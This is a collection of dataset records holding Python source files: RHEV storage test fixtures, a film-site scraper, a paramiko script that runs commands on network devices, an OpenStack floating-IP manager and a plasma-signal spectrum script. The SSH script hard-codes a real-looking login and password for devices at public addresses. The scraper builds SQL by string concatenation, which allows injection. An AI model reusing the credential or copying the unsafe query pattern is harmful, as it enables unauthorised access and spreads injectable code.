{"api_name": "sklearn.metrics.classification_report", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}]} +{"seq_id": "336702203", "text": "\"\"\"\nFixtures for reduce_luns_from_storage_domain module\n\"\"\"\nimport pytest\nimport config\nfrom art.unittest_lib.common import testflow\nfrom art.rhevm_api.tests_lib.low_level import (\n storagedomains as ll_sd,\n disks as ll_disks,\n vms as ll_vms\n)\nfrom rhevmtests.fixtures import (\n create_lun_on_storage_server, remove_lun_from_storage_server\n)\n\n\n@pytest.fixture(scope='class')\ndef set_disk_params(request, storage):\n \"\"\"\n Set disk size\n \"\"\"\n self = request.node.cls\n size_diff = getattr(self, 'size_diff', 5)\n self.disk_size = ll_sd.get_free_space(\n self.new_storage_domain\n ) - size_diff * config.GB\n assert self.disk_size, \"Failed to get storage domain %s size\" % (\n self.new_storage_domain\n )\n self.add_disk_params = {'sparse': False, 'format': config.RAW_DISK}\n\n\n@pytest.fixture(scope='class')\ndef init_domain_disk_param(request, storage):\n \"\"\"\n Initialize VM parameters\n \"\"\"\n self = request.node.cls\n\n # In some cases we would like the disk to be created on an existing SD (for\n # example, in disk migration tests)\n if hasattr(self, 'existing_domain'):\n existing_domains = ll_sd.getStorageDomainNamesForType(\n config.DATA_CENTER_NAME, self.storage\n )\n self.storage_domain = existing_domains[0] if existing_domains[0] != (\n self.new_storage_domain\n ) else existing_domains[1]\n else:\n self.storage_domain = self.new_storage_domain\n\n\n@pytest.fixture(scope='class')\ndef attach_disk_to_second_vm(request, storage):\n \"\"\"\n Attach shared disk to second VM\n \"\"\"\n self = request.node.cls\n\n attach_kwargs = config.attach_disk_params.copy()\n testflow.setup(\n \"Attaching shared disk %s to VM %s\", self.disk_name, self.vm_name_2\n )\n assert ll_disks.attachDisk(\n True, alias=self.disk_name, vm_name=self.vm_name_2, **attach_kwargs\n ), (\"Failed to attach disk %s to VM %s\" % (self.disk_name, self.vm_name_2))\n ll_disks.wait_for_disks_status([self.disk_name])\n\n\n@pytest.fixture(scope='class')\ndef set_shared_disk_params(request, storage):\n \"\"\"\n Set shared disk params\n \"\"\"\n self = request.node.cls\n\n self.storage_domain = self.new_storage_domain\n\n # shared disk cannot be sparse\n self.add_disk_params = {\n 'shareable': True, 'sparse': False, 'format': config.RAW_DISK\n }\n\n\n@pytest.fixture(scope='class')\ndef poweroff_vms(request, storage):\n \"\"\"\n Power off VMs\n \"\"\"\n self = request.node.cls\n\n def finalizer():\n testflow.teardown(\"Power off VMs %s\", [self.vm_name, self.vm_name_2])\n assert ll_vms.stop_vms_safely([self.vm_name, self.vm_name_2]), (\n \"Failed to power off VMs %s\" % [self.vm_name, self.vm_name_2]\n )\n request.addfinalizer(finalizer)\n\n\n@pytest.fixture(scope='class')\ndef create_second_lun(request, storage):\n \"\"\"\n Create second LUN on storage server\n \"\"\"\n create_lun_on_storage_server(request, storage)\n append_to_luns_to_resize(request, storage)\n\n\n@pytest.fixture(scope='class')\ndef remove_second_lun(request, storage):\n \"\"\"\n Remove second LUN from storage server\n \"\"\"\n remove_lun_from_storage_server(request, storage)\n\n\n@pytest.fixture(scope='class')\ndef append_to_luns_to_resize(request, storage):\n \"\"\"\n Initialize LUNs to extend list\n \"\"\"\n self = request.node.cls\n\n def finalizer():\n del config.LUNS_TO_RESIZE[:]\n del config.LUNS_IDENTIFIERS[:]\n request.addfinalizer(finalizer)\n config.LUNS_TO_RESIZE.append(self.new_lun_id)\n config.LUNS_IDENTIFIERS.append(self.new_lun_identifier)\n", "sub_path": "art/tests/rhevmtests/storage/storage_resize_storage_domain/fixtures.py", "file_name": "fixtures.py", "file_ext": "py", "file_size_in_byte": 3610, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "art.rhevm_api.tests_lib.low_level.storagedomains.get_free_space", "line_number": 24, "usage_type": "call"}, {"api_name": "art.rhevm_api.tests_lib.low_level.storagedomains", "line_number": 24, "usage_type": "name"}, {"api_name": "config.GB", "line_number": 26, "usage_type": "attribute"}, {"api_name": "config.RAW_DISK", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 17, "usage_type": "call"}, {"api_name": "art.rhevm_api.tests_lib.low_level.storagedomains.getStorageDomainNamesForType", "line_number": 43, "usage_type": "call"}, {"api_name": "art.rhevm_api.tests_lib.low_level.storagedomains", "line_number": 43, "usage_type": "name"}, {"api_name": "config.DATA_CENTER_NAME", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 33, "usage_type": "call"}, {"api_name": "config.attach_disk_params.copy", "line_number": 60, "usage_type": "call"}, {"api_name": "config.attach_disk_params", "line_number": 60, "usage_type": "attribute"}, {"api_name": "art.unittest_lib.common.testflow.setup", "line_number": 61, "usage_type": "call"}, {"api_name": "art.unittest_lib.common.testflow", "line_number": 61, "usage_type": "name"}, {"api_name": "art.rhevm_api.tests_lib.low_level.disks.attachDisk", "line_number": 64, "usage_type": "call"}, {"api_name": "art.rhevm_api.tests_lib.low_level.disks", "line_number": 64, "usage_type": "name"}, {"api_name": "art.rhevm_api.tests_lib.low_level.disks.wait_for_disks_status", "line_number": 67, "usage_type": "call"}, {"api_name": "art.rhevm_api.tests_lib.low_level.disks", "line_number": 67, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 53, "usage_type": "call"}, {"api_name": "config.RAW_DISK", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 70, "usage_type": "call"}, {"api_name": "art.unittest_lib.common.testflow.teardown", "line_number": 93, "usage_type": "call"}, {"api_name": "art.unittest_lib.common.testflow", "line_number": 93, "usage_type": "name"}, {"api_name": "art.rhevm_api.tests_lib.low_level.vms.stop_vms_safely", "line_number": 94, "usage_type": "call"}, {"api_name": "art.rhevm_api.tests_lib.low_level.vms", "line_number": 94, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 85, "usage_type": "call"}, {"api_name": "rhevmtests.fixtures.create_lun_on_storage_server", "line_number": 105, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 100, "usage_type": "call"}, {"api_name": "rhevmtests.fixtures.remove_lun_from_storage_server", "line_number": 114, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 109, "usage_type": "call"}, {"api_name": "config.LUNS_TO_RESIZE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "config.LUNS_IDENTIFIERS", "line_number": 126, "usage_type": "attribute"}, {"api_name": "config.LUNS_TO_RESIZE.append", "line_number": 128, "usage_type": "call"}, {"api_name": "config.LUNS_TO_RESIZE", "line_number": 128, "usage_type": "attribute"}, {"api_name": "config.LUNS_IDENTIFIERS.append", "line_number": 129, "usage_type": "call"}, {"api_name": "config.LUNS_IDENTIFIERS", "line_number": 129, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 117, "usage_type": "call"}]} +{"seq_id": "315715026", "text": "import requests\nimport re\nimport time\nfrom config import *\nfrom pprint import pprint\n\nheaders = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'keep-alive',\n 'Host': 'dianying.2345.com',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36',\n}\n\n\n\ns = requests.session()\nurl_detail_page = []\n# http://dianying.2345.com/list/donghua-riben------2.html\nfor i in range(1,5):\n res = s.get('http://dianying.2345.com/list/donghua-riben------{}.html'.format(str(i)),headers=headers)\n print(res.status_code)\n url_detail_page += re.findall(r'target=\"_blank\" href=\"(.*?)\"',res.text)\n time.sleep(1)\n\nvideo_info = []\nhaibaos = []\nfor url in url_detail_page:\n res = s.get('http:'+url,headers=headers)\n # http://www.36605558.com/index.php?\n videoname = re.findall(r'《(.*?)》',res.text)[0]# 影片名\n haibao = 'http:'+ re.findall(r'onerror=\"javascript:this.src=\\'(.*?)>',res.text)[0].split('src=\"')[1].replace('\\\"','') # 海报\n director = re.findall(r'ys_dy_2015_detail_daoy\" title=\"(.*?)\"',res.text)[0] if re.findall(r'ys_dy_2015_detail_daoy\" title=\"(.*?)\"',res.text)!=[] else 'NULL' # 导演\n videotime = re.findall(r'<em>(.*?)分钟</em>',res.text)[0] if re.findall(r'<em>(.*?)分钟</em>',res.text)!=[] else 'NULL' # 时长\n area = re.findall(r'<a title=\"(.*?)\" data-ajax83=\"ys_dy_2015_detail_diq\"',res.text)[0] if re.findall(r'<a title=\"(.*?)\" data-ajax83=\"ys_dy_2015_detail_diq\"',res.text)!=[] else 'NULL' # 地区\n score = re.findall(r'<em class=\"emScore\">(.*?)</em>',res.text)[0] if re.findall(r'<em class=\"emScore\">(.*?)</em>',res.text)!=[] else 'NULL' # 评分\n description = re.findall(r'<span class=\"sAll\">(.*?)</span>',res.text)[0] if re.findall(r'<span class=\"sAll\">(.*?)</span>',res.text)!=[] else 'NULL' # 简介\n videourl ='http://www.36605558.com/index.php?url='+re.findall(r'<a href=\"(.*?)\" target=\"_blank\" class=\"v_blue_btn latestBtn\"',res.text)[0] if re.findall(r'<a href=\"(.*?)\" target=\"_blank\" class=\"v_blue_btn latestBtn\"',res.text)!=[] else 'NULL' # 播放地址,第一个播放地址\n time.sleep(0.5)\n video_info.append((videoname,director,videotime,area,score,description,videourl))\n pprint((videoname,director,videotime,area,score,description,videourl))\n haibaos.append(haibao)\n\ncur.executemany('INSERT INTO donghuapian_donghuadianying(video_name,video_director,video_time,video_area,video_score,video_description,video_url) VALUES (%s,%s,%s,%s,%s,%s,%s)',video_info[:-1])\ncon.commit()\n# for detail,haibao in zip(video_info,haibaos):\n# with open('./images/'+detail[0].replace('\\\\','')+'.jpg','wb') as f:\n# f.write(s.get(haibao).content)\n\nimport os\nimages = os.listdir('dongmantiandi/dongmantiandi/media')\nfor img in images:\n sql = 'UPDATE donghuapian_donghuadianying set video_image=\"images/'+img+'\" where video_name=\"'+img.split('.')[0]+'\"'\n cur.execute(sql)\n con.commit()", "sub_path": "spiders/dongmandianying_spider.py", "file_name": "dongmandianying_spider.py", "file_ext": "py", "file_size_in_byte": 3187, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.session", "line_number": 20, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 26, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 27, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 34, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 35, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 36, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 37, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 38, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 39, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 40, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 41, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 42, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 44, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "443430269", "text": "# -*- coding=utf-8 -*-\n\nimport paramiko\nimport datetime\nimport time\nimport re\n\n\n# 支持读取多页回显(仅华为可用,思科暂不明确),已解决空行问题,就和CRT显示的一样~\ndef ssh_cmd(ip, username, password, cmd_list, verbose=True):\n ssh = paramiko.SSHClient() # 创建SSH Client\n ssh.load_system_host_keys() # 加载系统SSH密钥\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # 添加新的SSH密钥\n ssh.connect(ip, port=22, username=username, password=password, timeout=5, compress=True) # SSH连接\n\n chan = ssh.invoke_shell() # 激活交互式shell\n time.sleep(2)\n # x = chan.recv(2048).decode() # 接收回显信息\n resul = ''\n space = ' ' # 要发送的空格\n\n for cmd in cmd_list: # 逐个读取命令\n print(ip, cmd)\n chan.send(cmd.encode()) # 执行命令,注意字串都需要编码为二进制字串\n chan.send(b'\\n') # 一定要注意输入回车\n time.sleep(2) # 由于有些回显可能过长,所以可以考虑等待更长一些时间\n x = chan.recv(40960).decode() # 读取回显,有些回显可能过长,请把接收缓存调大\n\n # o = re.sub('\\s+----\\sMore\\s----', '', x)\n o = re.sub('\\r\\n', '\\n', re.sub('\\s+----\\sMore\\s----', '', x), re.S | re.M)\n resul += re.sub('\\r\\n', '\\n', o, re.S | re.M)\n\n # 一直空格 直到回显完\n while 1:\n # 如果 本次回显为 <sysname> 就退出循环 否则 继续发送空格 读取命令剩余的回显\n if re.match('.*<.+>', x.strip()): # strip 很重要!!!\n # print('1')\n\n break\n else:\n # print('2')\n chan.send(space.encode())\n chan.send(b'\\n')\n time.sleep(2) # 防止有的设备反应慢,还是多等一会儿吧\n x = chan.recv(40960).decode()\n # abc = re.sub('\\s+----\\sMore\\s----', '', x)\n o = re.sub('\\x1b\\[\\d{2}D[\\s]+\\x1b\\[\\d{2}D', '\\r\\n', re.sub('\\s+----\\sMore\\s----', '', x))\n # \\x1b[42D \\x1b[42D\n resul += re.sub('\\r\\n', '\\n', o, re.S | re.M)\n # 空格后回显会有上面这类字符,需要干掉\n\n sysname = re.match('.*<(.+)>', x.strip()).groups()[0]\n\n chan.close() # 退出交互式shell\n ssh.close() # 退出ssh会话\n # print([resul])\n return resul, sysname\n\n\ndef resule_to_txt(ipadd, cmd):\n res, sysname = ssh_cmd(ipadd, 'wujiajie', '1ffw#1*dF', cmd) # ssh登录的 用户名 密码在此\n ti = datetime.datetime.now().strftime('%Y.%m.%d %H.%M.%S')\n with open('{} -- {}.txt'.format(sysname, ipadd), 'w') as f:\n f.write(res)\n print('{} -- {} -- {}'.format(sysname, ipadd, ti) + ' 已完成!')\n\n\nif __name__ == '__main__':\n # print(ssh_cmd('192.168.0.97', 'wujiajie', '1ffw#1*dF', 'dis cu'))\n lis = ['111.1.48.28',\n '111.1.48.126',\n ]\n\n cm = ['dis acl all',\n 'dis policy all',\n ]\n\n # try:\n for i in lis:\n resule_to_txt(i, cm) # 设备地址 命令\n\n # except Exception as ex:\n # print(ex)\n\n", "sub_path": "ssh_sth.py", "file_name": "ssh_sth.py", "file_ext": "py", "file_size_in_byte": 3211, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "paramiko.SSHClient", "line_number": 11, "usage_type": "call"}, {"api_name": "paramiko.AutoAddPolicy", "line_number": 13, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 17, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 30, "usage_type": "call"}, {"api_name": "re.S", "line_number": 30, "usage_type": "attribute"}, {"api_name": "re.M", "line_number": 30, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 31, "usage_type": "call"}, {"api_name": "re.S", "line_number": 31, "usage_type": "attribute"}, {"api_name": "re.M", "line_number": 31, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 36, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 44, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 47, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 49, "usage_type": "call"}, {"api_name": "re.S", "line_number": 49, "usage_type": "attribute"}, {"api_name": "re.M", "line_number": 49, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 62, "usage_type": "attribute"}]} +{"seq_id": "225881116", "text": "# -*- encoding: utf-8 -*-\n# Copyright 2016 Vinzor Co.,Ltd.\n#\n# comment\n#\n# 4/19/16 bitson : Init\n\nimport os\nimport sys\nimport re\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', '..')))\n\n\nimport threading\nimport time\nimport logging\n\nfrom phoenix.cloud.openstack.client import ClientManager\nfrom phoenix.common.proxy import SimpleProxy\nfrom phoenix.common.singleton import SingletonMixin\n\nfrom phoenix import db\nfrom phoenix.db.models import FloatingIp\n\nLOG = logging.getLogger(__name__)\n\n# check if neutron is supported\nNEUTRON_CLI = None\nKEYSTONE_CLI = SimpleProxy(lambda: ClientManager().keystone_client)\nif KEYSTONE_CLI.service_catalog.get_endpoints(service_type='network'):\n NEUTRON_CLI = SimpleProxy(lambda: ClientManager().neutron_client)\n\nNOVA_CLI = SimpleProxy(lambda: ClientManager().nova_client)\n\n# get resource managers\n# SERVERS = SimpleProxy(lambda: NOVA_CLI.servers)\n# FLOATING_IPS = SimpleProxy(lambda: NOVA_CLI.floating_ips)\n\n\nclass LocalFloatingIpManager(SingletonMixin):\n \"\"\"Local floating ip manager.\"\"\"\n\n # _stop_flag = False\n\n # def start_sync(self):\n # LOG.info('Start local floating ip table refreshing thread')\n # self.refresh_thread = threading.Thread(target=self.loop_refresh)\n # self.refresh_thread.start()\n\n # def stop_sync(self):\n # self._stop_flag = True\n\n def allocate_ip(self, external_net_id):\n if NEUTRON_CLI:\n ip = db.allocate_floating_ip(external_net_id)\n if not ip:\n body = {\n 'floatingip': {'floating_network_id': external_net_id}\n }\n result = NEUTRON_CLI.create_floatingip(body)\n new_floating_ip = result['floatingip']\n floating_ip_id = new_floating_ip['id']\n floating_ip_address = new_floating_ip['floating_ip_address']\n\n # add to floating ip table\n new_ip = FloatingIp()\n new_ip.ip_address = new_floating_ip['floating_ip_address']\n new_ip.external_network_id = new_floating_ip['floating_network_id']\n new_ip.ref_id = new_floating_ip['id']\n new_ip.status = FloatingIp.IP_STATUS.ACTIVE\n db.create_floating_ip(new_ip)\n else:\n floating_ip_id = ip.ref_id\n floating_ip_address = ip.ip_address\n return {'address': floating_ip_address,\n 'id': floating_ip_id}\n else:\n ip = db.allocate_floating_ip(external_net_id)\n if not ip:\n new_floating_ip = NOVA_CLI.floating_ips.create()\n new_ip = FloatingIp()\n new_ip.ip_address = new_floating_ip.ip\n new_ip.external_network_id = new_floating_ip.pool\n new_ip.ref_id = new_floating_ip.id\n new_ip.status = FloatingIp.IP_STATUS.ACTIVE\n db.create_floating_ip(new_ip)\n\n floating_ip_id = new_floating_ip.id\n floating_ip_address = new_floating_ip.ip\n else:\n floating_ip_id = ip.ref_id\n floating_ip_address = ip.ip_address\n return {'address': floating_ip_address,\n 'id': floating_ip_id}\n\n def reclaim_ip(self, ip):\n db.reclaim_floating_ip(ip)\n\n # def loop_refresh(self, frequency=10):\n # while not self._stop_flag:\n # self.refresh()\n # time.sleep(frequency)\n\n def refresh(self):\n if NEUTRON_CLI:\n db.delete_all_floating_ip()\n server_ips = NEUTRON_CLI.list_floatingips()\n for ip in server_ips['floatingips']:\n new_ip = FloatingIp()\n new_ip.ip_address = ip['floating_ip_address']\n new_ip.external_network_id = ip['floating_network_id']\n new_ip.ref_id = ip['id']\n new_ip.status = ip['status'].lower()\n db.create_floating_ip(new_ip)\n\n # server_ips_dict = {}\n # server_ips = NEUTRON_CLI.list_floatingips()\n # for ip in server_ips['floatingips']:\n # server_ips_dict[ip['floating_ip_address']] = ip\n #\n # local_ips_dict = {}\n # local_ips = db.get_all_floating_ips()\n # for ip in local_ips:\n # local_ips_dict[ip.ip_address] = ip\n #\n # # remove not ip in server\n # for ip in local_ips:\n # if not server_ips_dict.get(ip.ip_address, None):\n # db.delete_floating_ip(ip.id)\n #\n # # add ip new in server\n # for ip in server_ips['floatingips']:\n # if not local_ips_dict.get(ip['floating_ip_address'], None):\n # new_ip = FloatingIp()\n # new_ip.ip_address = ip['floating_ip_address']\n # new_ip.external_network_id = ip['floating_network_id']\n # new_ip.ref_id = ip['id']\n # new_ip.status = ip['status'].lower()\n # db.create_floating_ip(new_ip)\n else:\n db.delete_all_floating_ip()\n server_ips = NOVA_CLI.floating_ips.findall()\n for ip in server_ips:\n new_ip = FloatingIp()\n new_ip.ip_address = ip.ip\n new_ip.external_network_id = ip.pool\n new_ip.ref_id = ip.id\n new_ip.status = 'active' if ip.fixed_ip else 'down'\n db.create_floating_ip(new_ip)\n\n\n def clean(self):\n db.delete_all_floating_ip()\n\nfloating_ip_manager = LocalFloatingIpManager()\n\n# if __name__ == '__main__':\n# floating_ip_manager.clean()\n# floating_ip_manager.start_sync()\n", "sub_path": "src/phoenix/cloud/openstack/sync_openstack.py", "file_name": "sync_openstack.py", "file_ext": "py", "file_size_in_byte": 5771, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}, {"api_name": "phoenix.common.proxy.SimpleProxy", "line_number": 30, "usage_type": "call"}, {"api_name": "phoenix.cloud.openstack.client.ClientManager", "line_number": 30, "usage_type": "call"}, {"api_name": "phoenix.common.proxy.SimpleProxy", "line_number": 32, "usage_type": "call"}, {"api_name": "phoenix.cloud.openstack.client.ClientManager", "line_number": 32, "usage_type": "call"}, {"api_name": "phoenix.common.proxy.SimpleProxy", "line_number": 34, "usage_type": "call"}, {"api_name": "phoenix.cloud.openstack.client.ClientManager", "line_number": 34, "usage_type": "call"}, {"api_name": "phoenix.common.singleton.SingletonMixin", "line_number": 41, "usage_type": "name"}, {"api_name": "phoenix.db.allocate_floating_ip", "line_number": 56, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 56, "usage_type": "name"}, {"api_name": "phoenix.db.models.FloatingIp", "line_number": 67, "usage_type": "call"}, {"api_name": "phoenix.db.models.FloatingIp.IP_STATUS", "line_number": 71, "usage_type": "attribute"}, {"api_name": "phoenix.db.models.FloatingIp", "line_number": 71, "usage_type": "name"}, {"api_name": "phoenix.db.create_floating_ip", "line_number": 72, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 72, "usage_type": "name"}, {"api_name": "phoenix.db.allocate_floating_ip", "line_number": 79, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 79, "usage_type": "name"}, {"api_name": "phoenix.db.models.FloatingIp", "line_number": 82, "usage_type": "call"}, {"api_name": "phoenix.db.models.FloatingIp.IP_STATUS", "line_number": 86, "usage_type": "attribute"}, {"api_name": "phoenix.db.models.FloatingIp", "line_number": 86, "usage_type": "name"}, {"api_name": "phoenix.db.create_floating_ip", "line_number": 87, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 87, "usage_type": "name"}, {"api_name": "phoenix.db.reclaim_floating_ip", "line_number": 98, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 98, "usage_type": "name"}, {"api_name": "phoenix.db.delete_all_floating_ip", "line_number": 107, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 107, "usage_type": "name"}, {"api_name": "phoenix.db.models.FloatingIp", "line_number": 110, "usage_type": "call"}, {"api_name": "phoenix.db.create_floating_ip", "line_number": 115, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 115, "usage_type": "name"}, {"api_name": "phoenix.db.delete_all_floating_ip", "line_number": 142, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 142, "usage_type": "name"}, {"api_name": "phoenix.db.models.FloatingIp", "line_number": 145, "usage_type": "call"}, {"api_name": "phoenix.db.create_floating_ip", "line_number": 150, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 150, "usage_type": "name"}, {"api_name": "phoenix.db.delete_all_floating_ip", "line_number": 154, "usage_type": "call"}, {"api_name": "phoenix.db", "line_number": 154, "usage_type": "name"}]} +{"seq_id": "231320510", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport kawa.daq as dq\nimport kawa.spectrum as ksp\nimport matplotlib.pyplot as pl\nimport numpy as np\nimport pandas as pd\nimport scipy.signal as ss\nimport os\nos.chdir(\"/Users/yuichi/exp/\")\ndef read2d_64(shot,subno,kind = \"Iis\"):\n fid = dq.pantaADC()\n refpath = \"/Users/yuichi/KYTHON/ref/\"\n datapath = \"/Users/yuichi/data/\"\n dagfile = pd.read_csv(refpath + \"64ch.dag\",dtype = str,comment = \"#\")\n dt = 1e-6\n edge1 = int( 0.24 /dt) # dt * index = 0.24 <=> index = 0.24/dt\n edge2 = int( 0.54 /dt)\n count = -1\n if kind == \"Iis\":\n start = 0\n elif kind == \"Vf\":\n start = 1\n for i in range(start,64,2): #i == 0 => ch1 => Iis is odd num. \n count += 1\n if count == 0:\n signal,time = fid.read(shot = shotno, subshot = subno ,\n tower = dagfile.loc[i,\"tower\" ].strip(),\n station = dagfile.loc[i,\"station\"].strip(),\n ch = dagfile.loc[i,\"ch\" ].strip(),\n dir=datapath, samplingtime=True,\n start = edge1, end = edge2)\n #signal = signal-np.mean(signal)\n #signal = ksg.low_pass(signal,fs = 1e6, fcut =12e3,order = 5)\n if kind == \"Vf\":\n signal = 20 * signal\n df = pd.DataFrame(signal)\n else:\n signal = fid.read(shot = shotno, subshot = subno ,\n tower = dagfile.loc[i,\"tower\" ].strip(),\n station = dagfile.loc[i,\"station\"].strip(),\n ch = dagfile.loc[i,\"ch\" ].strip(),\n dir=datapath, samplingtime=False,\n start = edge1, end = edge2)\n #signal = signal-np.mean(signal)\n #signal = ksg.low_pass(signal,fs = 1e6, fcut =12e3,order = 5)\n if kind == \"Vf\":\n signal = 20 * signal\n df[count] = signal\n phase = np.linspace(0,1,32)\n return phase,time,df\n\n\nrf_list = np.arange(22,62,2)/10\nnum = np.arange(75,95)\ncount = -1\nvi = \"Iis\"\ntarget = 1\nlist2 = []\nfor i in num:\n count +=1\n print(rf_list[count])\n shotno = \"1053\" +str(i)\n for j in [\"003\"]:#,\"002\",\"003\"]:\n subno = j\n phase,time,df = read2d_64(shotno,subno,kind = vi)\n means = np.mean(df,axis = 1)\n #Iis\n if vi == \"Iis\":\n df = ((df.T - means)/means).T\n #Vf\n elif vi == \"Vf\":\n df = ((df.T - means)).T\n\n f,m,pfm = ksp.psd2d(df,time,nfft = 2**14,nensemble = 35)\n f/=1000\n \n import kawa.myplot as my\n fig = pl.figure()\n my.contourf_log(f,m,pfm,12,cmin = 1e-8,cmax = 1e-4)\n cbar = my.cbar_log(cmin = 1e-8,cmax = 1e-4)\n pl.xlim(0,12)\n pl.ylim(-2,6)\n pl.ylabel(\"Azimuthal mode number m\")\n pl.xlabel(\"frequency (kHz)\")\n pl.title(\"{}kW {}\".format(rf_list[count],vi))\n\n\n indm1 = np.argmin(abs(m-1))\n indf1 = np.argmax(pfm[indm1,f.size//2 + 4:])\n f1 = f[indf1 + f.size//2 + 4]\n y = np.arange(1,7)\n x = 1.55 * y\n pl.plot(x,y,\".k--\",markersize = 15)\n #pl.show()\n fig.savefig(\"{}kW PSD2D {}.png\".format(rf_list[count],vi))\n \n\n # Ranges = 6\n # #log ticks generate \n # lv = np.logspace( int(np.log10(power.max())) - Ranges, np.log10(power.max()) ,50)\n # import matplotlib.colors as mc\n # ticks = [10 ** int(np.log10(power.max()))]\n # for k in range(Ranges): \n # ticks.append(ticks[k] *10**-1)\n # pl.contourf(f,m, power, cmap = \"jet\", norm=mc.LogNorm(),levels = lv)\n \n # cbar = pl.colorbar()\n # cbar.set_ticks(ticks)\n # #pl.yscale(\"log\")\n # pl.ylim(-16,16)\n # pl.xlim(0,20)\n # pl.xlabel(\"frequency (kHz)\", fontsize = 15)\n # pl.ylabel(\"Azimuthal mode number\", fontsize = 15)\n # pl.show()\n", "sub_path": "sub/PSD2d.py", "file_name": "PSD2d.py", "file_ext": "py", "file_size_in_byte": 3875, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.chdir", "line_number": 10, "usage_type": "call"}, {"api_name": "kawa.daq.pantaADC", "line_number": 12, "usage_type": "call"}, {"api_name": "kawa.daq", "line_number": 12, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 67, "usage_type": "call"}, {"api_name": "kawa.spectrum.psd2d", "line_number": 75, "usage_type": "call"}, {"api_name": "kawa.spectrum", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "kawa.myplot.contourf_log", "line_number": 80, "usage_type": "call"}, {"api_name": "kawa.myplot", "line_number": 80, "usage_type": "name"}, {"api_name": "kawa.myplot.cbar_log", "line_number": 81, "usage_type": "call"}, {"api_name": "kawa.myplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, 